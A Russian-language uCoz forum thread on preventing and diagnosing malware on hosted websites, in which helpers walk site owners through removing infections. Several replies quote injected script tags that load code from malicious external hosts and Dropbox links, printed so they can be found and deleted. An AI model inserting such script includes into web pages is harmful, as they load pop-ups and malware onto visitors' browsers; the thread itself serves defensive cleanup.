Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    Ural-10
    Сообщений: 40
    Репутация: 7

    Сообщение # 61 | 21:00:24 28 Май 2013
    Столкнулся с такой не ординарной проблемой! На прошлой неделе Google выдал, что на вашем сайте вредоносное ПО и заблокировал его в своих поисковиках. После регистрации в Google-вебмастере (Webmaster Tools) обнаружил заражённые скрипты «Ротора баннеров». Т.к. они находятся в скрытой категории /rtr/ я обратился за помощью в службу поддержки, но вместо помощи получил заблокированный сайт sad .
    Люди подскажите, что мне теперь делать, как поступить.
    Прикрепления: 2320504.jpg (69.5 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 62 | 21:02:50 28 Май 2013
    Ural-10, адрес сайта додумайтесь дать. если сайт заблокирован юкозом, то разбирайтесь с тех.поддрежкой и удалите ротаторы
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Ural-10
    Сообщений: 40
    Репутация: 7

    Сообщение # 63 | 21:07:38 28 Май 2013
    webanet,
    Адрес сайта на скрине был, вот дубль http://нпгр-субр.рф или http://npgr-subr.ucoz.ru
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 64 | 21:12:15 28 Май 2013
    Ural-10, ну уберите свои ротаторы и пишите в тех.поддержку. сюда зачем писать?
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Ural-10
    Сообщений: 40
    Репутация: 7

    Сообщение # 65 | 21:17:37 28 Май 2013
    Дело в в том что если "косяк" появился в одном модуле, то рецидив может и в другом модуле получиться, например в "Фотоальбоме". Конечно я могу отказаться от модуля «Ротор баннеров» и прописать все баннеры в чистом HTML зассылив картинки.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 66 | 21:23:39 28 Май 2013
    Ural-10, а что у вас было в содержании ротаторов?
    напротив каждого образца инфицированного кода в вебмастере есть code injection там есть какая-либо инфа? если есть, то какая?

    Цитата
    Конечно я могу отказаться от модуля «Ротор баннеров» и прописать все баннеры в чистом HTML зассылив картинки.
    вы не подумали, что проблема не в ротаторе баннеров как таковом, а в содержании?
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    astrolon
    Сообщений: 5
    Репутация: 3

    Сообщение # 67 | 16:15:47 31 Май 2013
    Давно уже пользуюсь бесплатным хостингом на ucoz. Был всем доволен, даже знакомым там сайты визитки сделал. Наличие рекламы в правом верхнем углу, тоже понятно, раз хостинг бесплатный. Но недавно к этой рекламе начали добавляться еще всякие всплывающие окна, которые закрывают почти весь обзор. Это такое "мягкое" указание, что надо платить, а иначе сайт превратиться в рекламную помойку? Или как это понимать? Чтобы не быть голословным скриншоты в спойлерах:
    АстролонЫч
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 68 | 16:30:48 31 Май 2013
    astrolon, ваш сайт http://astrolon.at.ua/ заражен

    панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Код
    <script type="text/javascript" src="http://blogmarino4ka.ru/pop-up.js"></script>
    - поле на что заменить оставляете пустым и производите замену во всех модулях

    тоже самое надо сделать со скриптами

    Код
    <script type="text/javascript" src="http://blogmarino4ka.ru/jQuery.js"></script>


    Код
    <script type="text/javascript" src="http://blogmarino4ka.ru/jQuery_v2.js"></script>


    Код
    <script language="javascript" src="./js.php?s=54"></script>


    Код
    <script type="text/javascript" src="http://dl.dropbox.com/u/36053555/script.js"></script>


    Код
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>


    Код
    <script type="text/javascript" src="https://dl.dropbox.com/sh/01qpqzzng3uvqmp/Ib9fwZUJWE/script.js"></script>


    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script>


    далее из кода поиска гугла удалить скрипт

    Код
    <script language='javascript' type='text/javascript' src='http://nummobile.com/6bk2wga5lwc60hg3cbttzoyq63q08yd'></script>


    после очистки обязательно сменить пароли и особенно пароль uid профиля

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Daniela
    Сообщений: 44
    Репутация: -6

    Сообщение # 69 | 22:12:15 31 Май 2013
    Здравствуйте!

    У меня на сайте www.argerusa.com появился вирус.
    Об этом предупреждает Chrome и никого не пускает на мою страницу. Причем выдает нижеуказанный текст (в спойлере), иногда сразу после посещения главной страницы, иногда после посещения уже нескольких страниц, а иногда при попытки войти на сайт под своим ником.

    Не могу найти где эта проблема "зарыта" на сайте..в каких кодах?
    Пожалуйста помогите отыскать!

    Добавлено (31 Май 2013, 22:12:15)
    ---------------------------------------------
    Обычные антивирусные программы не находят на сайте вирусы. Подскажите , как бы мне вычислить этот вредоносный код?

    Сообщение отредактировал Daniela - Пятница, 31 Май 2013, 22:10:34
    Аруад
    Сообщений: 1
    Репутация: 0

    Сообщение # 70 | 22:45:56 31 Май 2013
    Здравствуйте уважаемая администрация системы ucoz.
    
    [/l][l]Мой сайт: cblood.clan.su

    Подвергся огромным спамом рекламы. (ранее которой не наблюдалось)

    скрин шот :

    За ранее благодарен за уделенное время моей теме. (Я не особо смыслу в программировании и делал сайт как любитель, поэтому прошу о помощи, так как незнаю как избавиться от данной проблемы)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 71 | 22:55:10 31 Май 2013
    Daniela, сайт в настоящее время не помечен как вредоносный и гугла хрума у меня заходит без табличек. по страницам погуляла без табличек.

    ищите secuencias.educ.ar в коде страниц. это аргентинский адрес. картинки. ссылки. содержимое ротатора баннеров
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    $Kenny$
    Сообщений: 84
    Репутация: 41

    Сообщение # 72 | 22:56:47 31 Май 2013
    Вот это все удалите:
    Код
    <script src="http://voice.said-that.info/?732778=HlceGEwIBgUJAQMOGVdZU1hcWw"/>
    <script src="http://voice.said-that.info/?698694=MnsyNGAkKiklLS8iNXt1f3Rwdg"/>
    <script src="http://friend.expect-no-thanks.info/?580690=Jm8mIHQwPj0xOTs2IW9ha2Bnaw"/>
    <script src="http://resting.delighted-that.info/?700140=mNGYnsqOgIOPh4WIn9Hd29_d2g"/>
    <script src="http://resting.delighted-that.info/?705714=xo_GwJTQ3t3R2dvWwY-DhYaDgg"/>
    <script src="http://resting.delighted-that.info/?711392=lN2UksaCjI-Di4mEk93R19TQ2A"/>
    <script src="http://convinced.same-idea.info/?772067=l96XkcWBj4yAiIqHkN7S1NDS1A"/>
    <script src="http://convinced.same-idea.info/?777879=46rj5bH1-_j0_P7z5KqmoKSmrw"/>
    <script src="http://would.hope-of-having.info/?851454=isOKjNickpGdlZeajcPNyc3Myw"/>
    <script src="http://would.hope-of-having.info/?859575=w4rDxZHV29jU3N7TxIqEgISFgQ"/>
    <script src="http://think.necessary-to-bring.info/?881532=CEEIDloeEBMfFxUYD0FPS09OSw"/>
    <script src="http://think.necessary-to-bring.info/?898501=sfixt-Onqaqmrqyhtvj28vb3_Q"/>
    <script src="http://would.hope-of-having.info/?668903=k9qTlcGFi4iEjI6DlNrU0NDU0A"/>
    <script src="http://think.necessary-to-bring.info/?793428=IGkgJnI2ODs3Pz0wJ2lnY2NnbA"/>
    <script src="http://particulars.about-a-week.info/?43088=JG0kInYyPD8zOzk0I21jZ2hmYg"/>
    <script src="http://particulars.about-a-week.info/?75046=UhtSVABESklFTU9CVRsVER4QFQ"/>
    <script src="http://carry.had-stuck.info/?174653=SQBJTxtfUVJeVlRZTgAOCgULCQ"/>
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 73 | 23:13:55 31 Май 2013
    $Kenny$, вы дали уже результат работы скрипта. его в коде найти нельзя, потому что нужно искать скрипт вызывающий это все

    Аруад, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script>


    поле на что заменить оставляете пустым и производите замену во всех модулях

    далее обязательно меняете uid пароль //forum.ucoz.ru/forum/45-52299-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Daniela
    Сообщений: 44
    Репутация: -6

    Сообщение # 74 | 23:17:46 31 Май 2013
    webanet, спасибо за подсказку , где искать. Про ротатор баннеров я не думала.
    Я тоже хожу по сайту до поры до времени без табличек,а потом вдруг выдает это предупреждение.
    Искала этот адрес по запросу "Поиск на сайте", но ничего не показывает.
    Может существует какая нибудь программа или онлайн сайт который ищет заданные ссылки? Еще раз спасибо за внимание..
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 75 | 23:20:26 31 Май 2013
    Daniela, все. пошлялась по страницам и нашла

    вот тут http://www.argerusa.com/rtr/4-16 ротатор баннеров как я и говорила. ссылка на вредоносный сайт в этом ротаторе.
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: